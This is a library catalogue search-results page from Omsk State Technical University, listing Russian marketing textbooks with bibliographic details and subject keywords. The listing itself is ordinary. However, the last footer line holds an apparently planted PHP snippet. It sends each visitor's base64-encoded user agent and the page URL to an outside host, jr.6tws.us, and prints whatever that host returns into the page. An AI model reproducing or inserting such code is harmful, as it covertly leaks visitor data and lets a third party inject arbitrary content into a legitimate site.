Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

285 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МАРКЕТИНГОВОЕ ИССЛЕДОВАНИЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 52
1. 
Федько, Валерий Павлович. Основы маркетинга [Текст] : 100 экзаменац. ответов / В. П. Федько, Н. Г. Федько, 2000. - 444 с.
Ключевые слова 
Маркетинг -- Маркетинговое исследование -- Рынок -- Сегментация рынка -- Позиционирование -- Рыночная ниша -- конъюнктура рынка -- Товар -- Фирма -- Компенсация -- Полезность -- Товарная политика -- Ассортимент -- Покупатель -- Спрос -- Упаковка -- Маркировка -- Товарный знак -- Штриховой код -- Стратегия -- Конкуренция -- Франчайзинг -- Сбыт -- Биржа -- Аукцион -- Бизнес-план -- Коммуникация -- Репутация -- Паблик рилейшнз -- Ценообразование -- Реклама -- Имидж -- Цена -- Контроллинг -- Бюджет -- Этикет -- Сделка внешнеторговая -- КОММУНИКАЦИЯ МАРКЕТИНГОВАЯ -- паблик рилейшнз -- РЕКЛАМА - МАРКЕТИНГ -- МАРКЕТИНГ МЕЖДУНАРОДНЫЙ -- Имидж фирмы -- СТИЛЬ ФИРМЕННЫЙ -- ПОЛИТИКА ЦЕНОВАЯ -- ЦЕНООБРАЗОВАНИЕ - маркетинг -- СЛУЖБА МАРКЕТИНГА -- КОНТРОЛЛИНГ -- БЮДЖЕТ МАРКЕТИНГА
2. 
Старобинский, Эдгар Евгеньевич. Самоучитель по рекламе [Текст] / Э. Е. Старобинский, 1997. - 297 с.
Держатели документа (Информация об экземплярах) 
3. 
Модульная программа для менеджеров [Текст] : В 17 кн. / Университет упр.(Москва). Кн. 13 : Управление маркетингом / Б. А. Соловьев, 2000. - 266 с.
4. 
Черчилль, Гилберт. Маркетинговые исследования [Текст] / А. Черчилль ; пер. Н. Амид, 2000. - 748 с.
5. 
Котлер, Филип. Основы маркетинга [Текст] / Ф. Котлер; Под ред. Е. М. Пеньковой, Пер. с англ. В. Б. Боброва, 1994. - 698 с.
6. 
Ноздрева Р. Б. Маркетинг [Текст] : Учеб., практикум и учеб.-метод. комплекс по маркетингу для вузов по экон. специальностям и направлениям / Р. Б. Ноздрева, В. Ю. Гречков, Г. Д. Крылова, М. И. Соколова, 2000. - 566 с.
Оглавление 
  • Крылова, Г. Д. Практикум по маркетингу / Г. Д. Крылова, М. И. Соколова
  • Ноздрева, Р. Б. Учебно-методический комплекс по маркетингу / Р. Б. Ноздрева, Г. Д. Крылова, М. И. Соколова
7. 
Международный маркетинг [Текст] : учеб. пособие для студентов, обучающихся по экон. специальностям и направлениям / Н. И. Перцовский, И. А. Спиридонов, С. В. Барсукова; Под ред. Н. И. Перцовского, 2001. - 238, [1] с.
8. 
Терещенко, Владимир Михайлович. Маркетинг: новые технологии в России [Текст] / В. М. Терещенко, 2001. - 415 с.
9. 
Костоглодов Д. Д. Маркетинг и логистика фирмы [Текст] / Д. Д. Костоглодов, И. И. Саввиди, В. Н. Стаханов, 2000. - 127 с.
10. 
Перлов, Владимир Исаакович. Маркетинг на предприятии отрасли печати [Текст] : Учеб. пособие для вузов по специальностям 060800 "Экономика и управление на предприятии", 060500 "Бухгалтерский учет, анализ и аудит", 210100 "Управление и информатика в технических системах", 220200 "Автоматизированные системы обработки информ. и упр." / В. И. Перлов, 2000. - 283 с.
Держатели документа (Информация об экземплярах) 
11. 
Управление организацией [Текст] : Учеб. для вузов по специальности "Менеджмент" / Г. Л. Азоев, В. П. Баранчеев, В. Н. Гунин; А. Г. Поршнев, 1999. - 668 с.
Ключевые слова 
Управление организацией -- Управление предприятием -- Организация -- Предприятие -- Учебник и пособие * -- Менеджмент -- Менеджер -- Управление -- Стратегическое управление -- Маркетинг -- Маркетинговое исследование -- Инновационный менеджмент -- Нововведение -- Инновация -- Инновационная деятельность -- Инвестиция -- Управление персоналом -- Персонал -- Карьера -- Деловая карьера -- Финансовый менеджмент -- ДЕЯТЕЛЬНОСТЬ ИННОВАЦИОННАЯ -- ИННОВАЦИИ - инвестиции -- ПРОЕКТ ИННОВАЦИОННЫЙ -- УПРАВЛЕНИЕ ПЕРСОНАЛОМ -- ПЛАНИРОВАНИЕ КАДРОВОЕ -- НАЕМ персонала -- ОЦЕНКА ПЕРСОНАЛА -- ОТБОР ПЕРСОНАЛА -- АДАПТАЦИЯ ПЕРСОНАЛА -- ОРИЕНТАЦИЯ ПРОФЕССИОНАЛЬНАЯ -- КАРЬЕРА ДЕЛОВАЯ -- МЕНЕДЖМЕНТ ФИНАНСОВЫЙ -- ПРИБЫЛЬ ОРГАНИЗАЦИИ -- ПРИБЫЛЬ ВАЛОВАЯ -- ПРИБЫЛЬ ПЛАНОВАЯ -- РАСПРЕДЕЛЕНИЕ ПРИБЫЛИ -- УПРАВЛЕНИЕ ОБОРОТНЫМ КАПИТАЛ -- СРЕДСТВА ОБОРОТНЫЕ -- ОБЩЕСТВО АКЦИОНЕРНОЕ - финансы -- УПРАВЛЕНИЕ ПРОИЗВОДСТВОМ -- ПРОГРАММА ПРОИЗВОДСТВЕННАЯ -- ОРГАНИЗАЦИЯ СЕТЕВАЯ виртуальная
12. 
Управление организацией [Текст] : Учеб. для вузов по специальности "Менеджмент" / Г. Л. Азоев, В. П. Баранчеев, В. Н. Гунин; А. Г. Поршнев, 2000. - 668 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
13. 
Черняк, Виктор Захарович. Бизнес-планирование [Текст] : Учеб.-практ. пособие / В. З. Черняк, И. В. Довдиенко, А. В. Черняк, 2000. - 271 с.
Держатели документа (Информация об экземплярах) 
14. 
Котлер, Филип. Основы маркетинга [Текст] / Ф. Котлер; Пер. с англ. В. Б. Боброва; Под ред. Е. М. Пеньковой, 1992. - 734 с.
Держатели документа (Информация об экземплярах) 
15. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 1999. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Курс лекций -- Маркетинговая деятельность -- Покупатель -- Покупка -- Маркетинговое исследование -- Сегментация рынка -- Товарная марка -- Товар -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование сбыта -- Стратегическое управление -- Стратегическое планирование -- Маркетинг услуг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
16. 
Голиков, Евгений Александрович. Маркетинг и логистика [Текст] : Учеб. пособие / Е. А. Голиков, 2000. - 410 с.
17. 
Армстронг, Гари. Введение в маркетинг [Текст] : Пер. с англ. / Г. Армстронг, Ф. Котлер; Н. В. Шульпина, 2000. - 638 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Управление маркетингом -- Маркетинговое исследование -- Потребительский рынок -- Стратегическое планирование -- Клиент -- Конкурент -- Маркетинговая информационная система -- Маркетинг услуг -- Товар -- Ценообразование -- Цена -- Товародвижение -- Логистика -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Связь с общественностью -- Реклама -- Стимулирование сбыта -- Прямой маркетинг -- Интерактивный маркетинг -- Социальная ответственность -- Консьюмеризм -- Инвайронментализм -- Глобальный маркетинг -- Глобальный рынок -- Личная продажа -- Покупательское поведение -- Маркетинговая среда
Держатели документа (Информация об экземплярах) 
18. 
Котлер, Филип. Маркетинг менеджмент [Текст] / Ф. Котлер; Т. Виноградова, Л. А. Волкова, Ю. Н. Каптуревский, 2000. - 749 с.
Ключевые слова 
Маркетинг -- Менеджмент -- Маркетинговая стратегия -- Конкуренция -- Товар -- Потребитель -- Рынок -- Маркетинговое планирование -- Маркетинговое исследование -- Потребительский рынок -- Упаковка -- Этикетка -- Сервис -- Цена -- Ценообразование -- Розничная торговля -- Оптовая торговля -- Логистика -- Маркетинговая коммуникация -- Управление рекламой -- Стимулирование сбыта -- Связь с общественностью -- Прямой маркетинг -- Онлайновый маркетинг -- Личная продажа -- Маркетинговый канал -- Маркетинговая среда
Держатели документа (Информация об экземплярах) 
19. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 2000. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Маркетинговая деятельность -- Маркетинговая среда -- Покупатель -- Потребитель -- Покупка -- Рынок -- Маркетинговое исследование -- Сегментация рынка -- Товар -- Товарная марка -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование -- Пропаганда -- Стратегическое управление -- Международный маркетинг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
20. 
Разроев, Элдар. Маркетинг сотовой связи [Текст] / А. Разроев, 1999. - 160 с.
Ключевые слова 
Сотовая связь -- Маркетинг -- Конкуренция -- Телекоммуникационный рынок -- Прогнозирование -- Инвестиционный ресурс -- Бизнес -- Планирование -- Маркетинговое исследование -- Сотовая сеть -- Спрос -- Сегментация -- Позиционирование -- Ценообразование -- Цена -- Коммуникация -- Реклама -- Связь с общественностью -- Продажа -- Абонент -- Абонентское обслуживание -- Инфраструктурный резерв -- Сотовая технология -- Абонент -- Абонентское -- обслуживание -- Инфраструктурный -- резерв -- Сотовая
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2902 - 21.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.26 с.12 запросов, 0.97c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;